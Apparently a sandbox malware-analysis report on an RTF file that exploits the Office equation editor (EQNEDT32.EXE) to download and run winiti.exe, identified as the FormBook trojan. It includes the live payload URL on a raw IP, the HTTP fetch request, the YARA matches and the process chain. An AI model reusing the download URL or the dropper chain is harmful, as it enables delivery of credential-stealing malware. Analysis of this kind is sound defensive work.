                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A14C26B1-EEA7-4E1B-A080-B2F59643795F}.tmpJump to behavior
                Source: global trafficHTTP traffic detected: GET /80/winiti.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
                Source: EQNEDT32.EXEString found in binary or memory: http://104.219.239.104/80/winiti.exe
                Source: EQNEDT32.EXE, 00000002.00000002.359904925.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/80/winiti.exeRea
                Source: EQNEDT32.EXE, 00000002.00000002.359904925.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/80/winiti.exej
                Source: EQNEDT32.EXE, 00000002.00000002.359904925.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/80/winiti.exekkC:
                Source: EQNEDT32.EXE, 00000002.00000002.359904925.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/80/winiti.exez

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: DzokrPQPdy.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: 6.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Office equation editor drops PE file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\winiti.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_0042BEE3 NtClose,6_2_0042BEE3
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D807AC NtCreateMutant,LdrInitializeThunk,6_2_00D807AC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7F9F0 NtClose,LdrInitializeThunk,6_2_00D7F9F0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_00D7FAE8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_00D7FB68
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_00D7FDC0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D800C4 NtCreateFile,6_2_00D800C4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D80048 NtProtectVirtualMemory,6_2_00D80048
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D80078 NtResumeThread,6_2_00D80078
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D80060 NtQuerySection,6_2_00D80060
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D801D4 NtSetValueKey,6_2_00D801D4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D8010C NtOpenDirectoryObject,6_2_00D8010C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D80C40 NtGetContextThread,6_2_00D80C40
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D810D0 NtOpenProcessToken,6_2_00D810D0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D81148 NtOpenThread,6_2_00D81148
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7F8CC NtWaitForSingleObject,6_2_00D7F8CC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7F900 NtReadFile,6_2_00D7F900
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D81930 NtSetContextThread,6_2_00D81930
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7F938 NtWriteFile,6_2_00D7F938
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FAD0 NtAllocateVirtualMemory,6_2_00D7FAD0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FAB8 NtQueryValueKey,6_2_00D7FAB8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FA50 NtEnumerateValueKey,6_2_00D7FA50
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FA20 NtQueryInformationFile,6_2_00D7FA20
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FBE8 NtQueryVirtualMemory,6_2_00D7FBE8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FBB8 NtQueryInformationToken,6_2_00D7FBB8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FB50 NtCreateKey,6_2_00D7FB50
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FC90 NtUnmapViewOfSection,6_2_00D7FC90
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FC48 NtSetInformationFile,6_2_00D7FC48
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FC60 NtMapViewOfSection,6_2_00D7FC60
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FC30 NtOpenProcess,6_2_00D7FC30
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D81D80 NtSuspendThread,6_2_00D81D80
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FD8C NtDelayExecution,6_2_00D7FD8C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FD5C NtEnumerateKey,6_2_00D7FD5C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FED0 NtAdjustPrivilegesToken,6_2_00D7FED0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FEA0 NtReadVirtualMemory,6_2_00D7FEA0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FE24 NtWriteVirtualMemory,6_2_00D7FE24
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FFFC NtCreateProcessEx,6_2_00D7FFFC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FFB4 NtCreateSection,6_2_00D7FFB4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D7FF34 NtQueueApcThread,6_2_00D7FF34
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_00183D985_2_00183D98
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_00183B385_2_00183B38
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_005919C05_2_005919C0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_00591DE85_2_00591DE8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_005919B15_2_005919B1
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_005922305_2_00592230
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_005922205_2_00592220
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_00592B505_2_00592B50
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_005927185_2_00592718
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_005927095_2_00592709
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_001811695_2_00181169
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_001804C85_2_001804C8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_004014206_2_00401420
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_004010006_2_00401000
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_004011546_2_00401154
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_004011606_2_00401160
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00416A4E6_2_00416A4E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00416A536_2_00416A53
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_0040FCCB6_2_0040FCCB
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_0040FCD36_2_0040FCD3
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_0042E5236_2_0042E523
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_0040FEF36_2_0040FEF3
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_0040DF736_2_0040DF73
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00402FD06_2_00402FD0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D8E0C66_2_00D8E0C6
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D8E2E96_2_00D8E2E9
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DB63DB6_2_00DB63DB
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E363BF6_2_00E363BF
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DDA37B6_2_00DDA37B
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D923056_2_00D92305
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E1443E6_2_00E1443E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E105E36_2_00E105E3
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DAC5F06_2_00DAC5F0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DD65406_2_00DD6540
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D9E6C16_2_00D9E6C1
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D946806_2_00D94680
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E326226_2_00E32622
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DDA6346_2_00DDA634
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D9C7BC6_2_00D9C7BC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D9C85C6_2_00D9C85C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DB286D6_2_00DB286D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E249F56_2_00E249F5
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DA69FE6_2_00DA69FE
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D929B26_2_00D929B2
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E3098E6_2_00E3098E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DDC9206_2_00DDC920
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E16BCB6_2_00E16BCB
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E3CBA46_2_00E3CBA4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E32C9C6_2_00E32C9C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E1AC5E6_2_00E1AC5E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D9CD5B6_2_00D9CD5B
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DC0D3B6_2_00DC0D3B
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DAEE4C6_2_00DAEE4C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DC2E2F6_2_00DC2E2F
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E02FDC6_2_00E02FDC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E2CFB16_2_00E2CFB1
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DA0F3F6_2_00DA0F3F
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DA905A6_2_00DA905A
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E0D06D6_2_00E0D06D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D930406_2_00D93040
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DBD0056_2_00DBD005
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E1D13F6_2_00E1D13F
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E312386_2_00E31238
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D8F3CF6_2_00D8F3CF
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D973536_2_00D97353
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DA14896_2_00DA1489
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DC54856_2_00DC5485
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DCD47D6_2_00DCD47D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E335DA6_2_00E335DA
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D9351F6_2_00D9351F
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DC57C36_2_00DC57C3
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E1579A6_2_00E1579A
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E2771D6_2_00E2771D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E2F8EE6_2_00E2F8EE
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E0F8C46_2_00E0F8C4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E1394B6_2_00E1394B
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E159556_2_00E15955
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E43A836_2_00E43A83
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00D8FBD76_2_00D8FBD7
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E1DBDA6_2_00E1DBDA
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DB7B006_2_00DB7B00
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E2FDDD6_2_00E2FDDD
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00DBDF7C6_2_00DBDF7C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00E1BF146_2_00E1BF14
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe 434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\winiti.exe 434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 00DD3F92 appears 132 times
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 00DD373B appears 253 times
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 00DFF970 appears 84 times
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 00D8E2A8 appears 60 times
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 00D8DF5C appears 137 times
                Source: DzokrPQPdy.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: 6.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: winiti[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: winiti.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 5.2.winiti.exe.253505c.3.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                Source: 5.2.winiti.exe.253505c.3.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                Source: 5.2.winiti.exe.240000.0.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                Source: 5.2.winiti.exe.240000.0.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: _0020.SetAccessControl
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 5.2.winiti.exe.5150000.4.raw.unpack, hNFj00Hv45CTOkfqEI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@7/9@0/1
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$okrPQPdy.rtfJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMutant created: NULL
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7A4D.tmpJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
